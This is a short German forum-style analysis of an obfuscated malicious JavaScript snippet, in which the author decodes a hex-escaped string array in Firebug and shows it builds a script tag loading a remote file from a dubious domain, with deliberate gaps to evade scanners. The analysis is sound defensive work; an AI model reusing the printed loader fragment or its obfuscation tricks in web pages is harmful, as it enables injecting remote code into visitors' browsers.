Ich öffnete Firebug und fügte einen Teil des Skripts in die Konsole ein (wobei ich darauf achtete, nur den Teil einzufügen, der eine Variable erstellte, und nicht den laufenden Code). Dies ist, was ich bekam:
was ich eingefügt habe:
console.log(["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"]);
das Ergebnis:
["src", "script", "cx7 2eateElement", "x 68ttp://ug-rad io.co.cc/flox 6Fd.js", "appendC x68ild", "body"]
Kurz gesagt, es handelt sich um ein Skript zum Laden einer externen Javascript-Datei von einem entfernten Server mit einem sehr zweifelhaft aussehenden Domänennamen.
Es gibt ein paar Zeichen, die nicht ganz so umgesetzt werden, wie man es erwarten würde. Dabei könnte es sich um Tippfehler handeln (unwahrscheinlich) oder um eine absichtliche weitere Verschleierung, um automatische Malware-Checker zu täuschen, die nach Skripten mit URLs oder Verweisen auf createElement
, usw. Der Rest des Skripts fügt diese Zeichen einzeln wieder ein, bevor es ausgeführt wird.
Der Name der Variablen _0x8dd5
wird gewählt, um siehe wie Hex-Code und machen das Ganze schwerer zu lesen, aber in Wirklichkeit ist es nur ein normaler Javascript-Variablenname. Im Rest des Skripts wird immer wieder darauf verwiesen, wenn Zeichen von einem Teil der Zeichenfolge in einen anderen kopiert werden, um die absichtlichen Lücken zu schließen.
Eindeutig ein bösartiges Skript.
Ich empfehle, sie sofort zu verbrennen! ;-)